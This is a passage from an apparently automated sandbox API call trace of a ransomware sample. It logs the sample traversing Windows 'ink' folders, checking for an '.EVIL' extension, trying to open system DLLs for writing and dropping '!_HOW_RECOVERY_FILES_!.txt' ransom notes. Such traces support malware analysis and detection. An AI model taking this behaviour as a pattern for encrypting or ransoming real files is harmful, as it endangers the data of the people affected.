lpFindFileData=0x84b0fdda00) returned 0 [0088.700] FindClose (in: hFindFile=0x84b11ddc80 | out: hFindFile=0x84b11ddc80) returned 1 [0088.700] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI") returned 0x39 [0088.700] strlen (_Str="${KEY}") returned 0x6 [0088.700] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.700] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.700] strlen (_Str="${CODE}") returned 0x7 [0088.700] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.700] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.700] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.700] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.700] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.700] __uncaught_exception () returned 0x84b1160800 [0088.701] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.701] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.701] wcsstr (_Str="sr-Latn-CS", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.701] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS") returned 62 [0088.701] wcscmp (_String1=".", _String2="sr-Latn-CS") returned -1 [0088.701] wcscmp (_String1="..", _String2="sr-Latn-CS") returned -1 [0088.701] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS") returned 0x3e [0088.701] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS") returned 0x0 [0088.701] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*" [0088.701] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd320 [0088.702] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.702] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\.") returned 64 [0088.702] wcscmp (_String1=".", _String2=".") returned 0 [0088.702] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.702] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.702] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\..") returned 65 [0088.702] wcscmp (_String1=".", _String2="..") returned -1 [0088.702] wcscmp (_String1="..", _String2="..") returned 0 [0088.702] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.702] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.702] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\tipresx.dll.mui") returned 78 [0088.702] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.702] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.702] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\tipresx.dll.mui") returned 0x4e [0088.702] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.702] GetLastError () returned 0x5 [0088.702] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.702] FindClose (in: hFindFile=0x84b11dd320 | out: hFindFile=0x84b11dd320) returned 1 [0088.702] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS") returned 0x3e [0088.702] strlen (_Str="${KEY}") returned 0x6 [0088.702] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.702] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.702] strlen (_Str="${CODE}") returned 0x7 [0088.702] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.702] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.702] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.702] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.703] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.703] __uncaught_exception () returned 0x84b1160800 [0088.703] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.703] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.703] wcsstr (_Str="sr-Latn-RS", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.703] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS") returned 62 [0088.703] wcscmp (_String1=".", _String2="sr-Latn-RS") returned -1 [0088.704] wcscmp (_String1="..", _String2="sr-Latn-RS") returned -1 [0088.704] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS") returned 0x3e [0088.704] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS") returned 0x0 [0088.704] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*" [0088.704] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd3e0 [0088.704] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.704] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\.") returned 64 [0088.704] wcscmp (_String1=".", _String2=".") returned 0 [0088.704] FindNextFileW (in: hFindFile=0x84b11dd3e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.704] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.704] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\..") returned 65 [0088.704] wcscmp (_String1=".", _String2="..") returned -1 [0088.704] wcscmp (_String1="..", _String2="..") returned 0 [0088.704] FindNextFileW (in: hFindFile=0x84b11dd3e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.704] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.704] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui") returned 78 [0088.704] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.704] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.704] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui") returned 0x4e [0088.704] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.711] GetLastError () returned 0x5 [0088.711] FindNextFileW (in: hFindFile=0x84b11dd3e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.711] FindClose (in: hFindFile=0x84b11dd3e0 | out: hFindFile=0x84b11dd3e0) returned 1 [0088.711] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS") returned 0x3e [0088.711] strlen (_Str="${KEY}") returned 0x6 [0088.711] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.711] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.711] strlen (_Str="${CODE}") returned 0x7 [0088.711] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.711] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.711] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.711] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.712] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.712] __uncaught_exception () returned 0x84b1160800 [0088.712] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.713] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.713] wcsstr (_Str="sv-SE", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.713] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE") returned 57 [0088.713] wcscmp (_String1=".", _String2="sv-SE") returned -1 [0088.713] wcscmp (_String1="..", _String2="sv-SE") returned -1 [0088.713] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE") returned 0x39 [0088.713] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE") returned 0x0 [0088.713] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*" [0088.713] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd0e0 [0088.713] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.713] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\.") returned 59 [0088.713] wcscmp (_String1=".", _String2=".") returned 0 [0088.713] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.713] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.713] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\..") returned 60 [0088.713] wcscmp (_String1=".", _String2="..") returned -1 [0088.713] wcscmp (_String1="..", _String2="..") returned 0 [0088.713] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.713] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.713] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui") returned 73 [0088.713] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.714] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.714] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui") returned 0x49 [0088.714] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.714] GetLastError () returned 0x5 [0088.714] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.714] FindClose (in: hFindFile=0x84b11dd0e0 | out: hFindFile=0x84b11dd0e0) returned 1 [0088.714] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE") returned 0x39 [0088.714] strlen (_Str="${KEY}") returned 0x6 [0088.714] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.714] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.714] strlen (_Str="${CODE}") returned 0x7 [0088.714] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.714] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.714] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.714] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.715] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.715] __uncaught_exception () returned 0x84b1160800 [0088.715] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.716] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.716] wcsstr (_Str="TabIpsps.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.716] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll") returned 64 [0088.716] wcscmp (_String1="TabIpsps.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.716] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="TabIpsps.dll") returned 0x0 [0088.716] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll") returned 0x40 [0088.716] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.716] GetLastError () returned 0x5 [0088.716] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.716] wcsstr (_Str="tabskb.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.716] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll") returned 62 [0088.716] wcscmp (_String1="tabskb.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.716] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tabskb.dll") returned 0x0 [0088.716] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll") returned 0x3e [0088.716] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.717] GetLastError () returned 0x5 [0088.717] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.717] wcsstr (_Str="TabTip.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.717] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe") returned 62 [0088.717] wcscmp (_String1="TabTip.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.717] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="TabTip.exe") returned 0x0 [0088.717] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe") returned 0x3e [0088.717] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabtip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.717] GetLastError () returned 0x5 [0088.717] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.717] wcsstr (_Str="th-TH", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.717] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH") returned 57 [0088.717] wcscmp (_String1=".", _String2="th-TH") returned -1 [0088.717] wcscmp (_String1="..", _String2="th-TH") returned -1 [0088.717] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH") returned 0x39 [0088.717] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH") returned 0x0 [0088.717] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*" [0088.717] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11ddb60 [0088.718] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.718] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\.") returned 59 [0088.718] wcscmp (_String1=".", _String2=".") returned 0 [0088.718] FindNextFileW (in: hFindFile=0x84b11ddb60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.718] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.718] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\..") returned 60 [0088.718] wcscmp (_String1=".", _String2="..") returned -1 [0088.718] wcscmp (_String1="..", _String2="..") returned 0 [0088.718] FindNextFileW (in: hFindFile=0x84b11ddb60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.718] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.718] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui") returned 73 [0088.718] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.718] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.718] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui") returned 0x49 [0088.718] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.718] GetLastError () returned 0x5 [0088.718] FindNextFileW (in: hFindFile=0x84b11ddb60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.718] FindClose (in: hFindFile=0x84b11ddb60 | out: hFindFile=0x84b11ddb60) returned 1 [0088.718] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH") returned 0x39 [0088.718] strlen (_Str="${KEY}") returned 0x6 [0088.718] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.718] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.718] strlen (_Str="${CODE}") returned 0x7 [0088.718] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.718] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.718] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.719] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.719] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.719] __uncaught_exception () returned 0x84b1160800 [0088.719] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.720] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.720] wcsstr (_Str="TipRes.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.720] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll") returned 62 [0088.720] wcscmp (_String1="TipRes.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.720] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="TipRes.dll") returned 0x0 [0088.720] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll") returned 0x3e [0088.720] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.720] GetLastError () returned 0x5 [0088.721] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.721] wcsstr (_Str="tipresx.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.721] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll") returned 63 [0088.721] wcscmp (_String1="tipresx.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.721] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll") returned 0x0 [0088.721] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll") returned 0x3f [0088.721] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.721] GetLastError () returned 0x5 [0088.721] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.721] wcsstr (_Str="tipskins.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.721] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll") returned 64 [0088.721] wcscmp (_String1="tipskins.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.721] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", 